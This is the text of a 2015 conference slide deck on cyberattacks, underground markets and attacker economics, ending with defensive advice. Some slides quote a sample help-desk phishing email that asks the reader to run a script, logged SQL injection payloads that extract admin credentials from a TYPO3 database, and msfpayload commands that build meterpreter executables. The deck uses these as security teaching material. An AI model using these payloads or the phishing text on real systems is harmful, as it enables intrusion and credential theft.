ATTACKS LIES AND THE UNDERGROUND WORLD
Andrea-Pompili-Attacks-Lies-and-the-Underground-World
Andrea-Pompili-Attacks-Lies-and-the-Underground-World
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
BERLIN 02.11.2015<br />
Speaker: Andrea Pompili<br />
<strong>ATTACKS</strong>, <strong>LIES</strong> <strong>AND</strong><br />
<strong>THE</strong> <strong>UNDERGROUND</strong> <strong>WORLD</strong><br />
There are only 10 types<br />
of people in the world:<br />
Those who understand binary,<br />
and those who don't<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
«<br />
»<br />
> Full Remediation and Hardening done one year ago<br />
> Operative Systems Patched to the last available version<br />
> Full Logging of all Site’s activities<br />
> 2 IPS Systems (Intrusion Prevention System) in cascade<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
10,00%<br />
8,60%<br />
6,80%<br />
6,80%<br />
5,70%<br />
6,10%<br />
34,70%<br />
28,90%<br />
31,70%<br />
34,10%<br />
34,10%<br />
27,20%<br />
55,30%<br />
62,50%<br />
61,50%<br />
59,10%<br />
60,20%<br />
66,70%<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Overall Attacks detected since 2009<br />
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “OAI Report 2015”<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
2,60%<br />
2,70%<br />
17,10%<br />
17,30%<br />
7,80%<br />
10,90%<br />
72,50%<br />
69,10%<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Detected Attack impacts 2013/2014<br />
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “OAI Report 2015”<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
«The purpose of this report is not detailing the results of the<br />
survey, but analyzing the data related to the average of the<br />
whole sample, we can establish that the results are:<br />
• quite good for the logical security;<br />
• very good for the infrastructure security;<br />
• good for the security related to services;<br />
• to be improved for organizational security.<br />
«We can say that we expected this»<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Russian Business Network<br />
ShadowCrew Avalanche<br />
Legion of Doom DarkMarket<br />
Masters of Deception<br />
Anton Gelonkin<br />
Leo Kuvayev<br />
The Silk Road CyberVor<br />
Sheep Marketplace<br />
Black Market Reloaded<br />
Evolution<br />
The Farmer’s Market<br />
Agora<br />
AlphaBay Market<br />
Lizard Squad<br />
419 Nigerian Scam<br />
Chinese Underground Market<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Source: Havocscope «Prices of Computer Hackers and Online Fraud»<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
http://www.forbes.com/sites/andygreenberg/2012/03/23/shoppingfor-zero-days-an-price-list-for-hackers-secret-software-exploits/<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Saturday, July 19, 1986<br />
Hacker Taps into Paris Computer<br />
Used in Space Study<br />
Page • ‹N›<br />
PAR I S — A hacker broke into<br />
sections of a powerful Americanbuilt<br />
computer that is used in<br />
French aerospace and other<br />
government research, officials<br />
said Friday. Jean-Claude Adan,<br />
deputy director of a Paris research<br />
center equipped with<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
the advanced, $10-million Cray1<br />
computer, said the intruder<br />
cracked a computer entry code on<br />
March 30.<br />
He said a special inquiry showed<br />
that the break-in lasted up to four<br />
hours and had probably been<br />
achieved with an ordinary home<br />
or office terminal hooked to the<br />
center by phone.<br />
The center, which handles work<br />
for the National Office of<br />
Aerospace Research and other<br />
government bodies, is<br />
considering taking legal action.<br />
There was no immediate comment<br />
from Cray Research, based in<br />
Minneapolis.<br />
Adan said that tracing the culprit,<br />
thought to be a skilled technician<br />
familiar with the Cray system,<br />
was extremely difficult because<br />
of the large number of home<br />
terminals.<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
« »<br />
Page • ‹N›<br />
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
(*) According to Frank Rieger<br />
Chief technology officer at GSMK<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Source: Vincenzo Iozzo – OWASP Day 2012<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Source: Vincenzo Iozzo – OWASP Day 2012<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
So, how does one get full remote code execution in Chrome? In the case of<br />
Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to<br />
successfully break out of the Chrome sandbox.<br />
(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)<br />
Last year (2011), VUPEN released a video to demonstrate a<br />
successful sandbox escape against Chrome but Google challenged<br />
the validity of that hack, claiming it exploited third-party code,<br />
believed to be the Adobe Flash plugin.<br />
(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browsersandbox-first-to-fall/10588)<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Blackole Exploit Kit<br />
Neutrino<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
From: hdesk@rcs.it<br />
Sent: Thursday, November 04, 2004 7:48 PM<br />
To: xxxxxx@rcs.it<br />
Subject: Configuration Update<br />
Good morning,<br />
you’re receiving this email because we’ve detected some troubles in your email account. These seems related<br />
to an uncorrect configuration of Your computer that need to be updated.<br />
Please connect to the following address to begin the update process:<br />
http://xxxx.rcs.it/software/av/index.html<br />
Please execute the auto-configuration script Configuration.vbe, which link is available at the intranet page<br />
specified above. Once the configuration has been concluded, a confirmation message will be prompted<br />
specifying the positive update execution.<br />
Kind Regards<br />
Help Desk – RCS Technical Support Team<br />
RCS Editori S.p.A.<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Configuration has been correctly updated, thanks for collaboration<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100]<br />
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"<br />
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100]<br />
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=<br />
1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,<br />
substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),<br />
floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100]<br />
"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=<br />
11502+and(select+1+from(select+count(*),concat_ws(0x3a,<br />
substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),<br />
repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(<br />
rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+"<br />
"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"<br />
Web Shell Extension<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
http://evader.stonesoft.com/<br />
http://insecure.org/stf/secnet_ids/secnet_ids.html<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
msfpayload windows/meterpreter/bind_tcp X ><br />
moca_x86_tcp_4444.exe<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
msfpayload windows/x64/meterpreter/bind_tcp X ><br />
moca_x64_tcp_4444.exe<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
“The truth is, consumer-grade antivirus products can’t<br />
protect against targeted malware created by wellresourced<br />
nation-states with bulging budgets.<br />
They can protect you against run-of-the-mill malware:<br />
banking trojans, keystroke loggers and e-mail worms.<br />
But targeted attacks like these go to great lengths to<br />
avoid antivirus products on purpose”<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Think like an Attacker so that you can understand<br />
what they’ll do and how they will attack<br />
Try to understand their targets, their abilities, but above<br />
all the operational constaints they have<br />
Identify the «perceived» value of the things you want to<br />
protect but, most importantly, what you want to protect<br />
Work on all the defense perimeter, without any act of faith<br />
If your defense is cheaper than the attack, you’ll always<br />
be in the lead<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
BERLIN 02.11.2015<br />
Questions?<br />
English<br />
¿Preguntas?<br />
Spanish<br />
مَطَالِب أَيَّة<br />
Arabic<br />
Ερωτήσεις?<br />
Greek<br />
Domande?<br />
Italian<br />
вопросы?<br />
Russian<br />
Sindarin<br />
tupoQghachmey<br />
Klingon<br />
Japanese<br />
Page • ‹N›<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.